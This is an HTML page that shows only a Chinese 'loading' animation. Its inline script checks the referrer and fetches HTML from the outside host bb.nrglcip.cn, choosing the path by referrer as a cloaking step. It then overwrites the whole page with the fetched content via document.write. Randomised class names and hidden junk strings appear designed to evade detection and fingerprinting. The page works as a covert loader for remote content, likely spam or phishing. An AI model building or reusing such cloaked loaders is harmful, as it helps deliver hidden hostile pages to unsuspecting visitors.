<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .lURHQvLjME {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .lURHQvLjME .qggOEnlk {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .lURHQvLjME .content {
            line-height: 50px;
            text-align: center
        }

        .lURHQvLjME .img {
            width: 100%
        }

        .lURHQvLjME .pfOhzGCS {
            text-align: center
        }

        .lURHQvLjME .pfOhzGCS span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .lURHQvLjME .pfOhzGCS span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .lURHQvLjME .pfOhzGCS span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .lURHQvLjME .pfOhzGCS span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .lURHQvLjME .pfOhzGCS span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .lURHQvLjME .pfOhzGCS span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .lURHQvLjME .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ML7LLSYYw(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var BzPHUo = ML7LLSYYw('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ BzPHUo +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ BzPHUo +".html?a=share";
		}
		
        PFpQFFGG6n=url+"#"+new Date().getTime();
        PFpQFFGG6n && function() {
            $.get(PFpQFFGG6n, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>Q1gsACIOEnUFtpAnOFjd4nTpblFX8CAeFrjbQrxHkGi9Tt3JL9J1OWqZCu6iBSCOZYWBO0Di</span>
<img  src='' style='display:none'>
<span style='display:none'>Q1gsACIOEnUFtpAnOFjd4nTpblFX8CAeFrjbQrxHkGi9Tt3JL9J1OWqZCu6iBSCOZYWBO0Di</span>
<img  src='' style='display:none'>
<li style='display:none' >gRAOgCNy2H77pcA4stQ06nzFoiucY2F6wC8o2AoW4FdtlrUGd3rmH4vQv0FlmvpIuxM</li><div class="lURHQvLjME">
    <div class="qggOEnlk">
        <div class="pfOhzGCS">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >r8ikwRXFOcI7sW7XDzstiRitrj9qfDiZ5KKTLo1V0ygDmllVDt7wplTi2NyWgdljWvbIEVO</ul>
<b style='display:none' >Z1u6D9RS5etl7OINZdZSxVn2WPeOtjWKUxr2JvcwZf</b>
<ul style='display:none' >r8ikwRXFOcI7sW7XDzstiRitrj9qfDiZ5KKTLo1V0ygDmllVDt7wplTi2NyWgdljWvbIEVO</ul></body>
</html>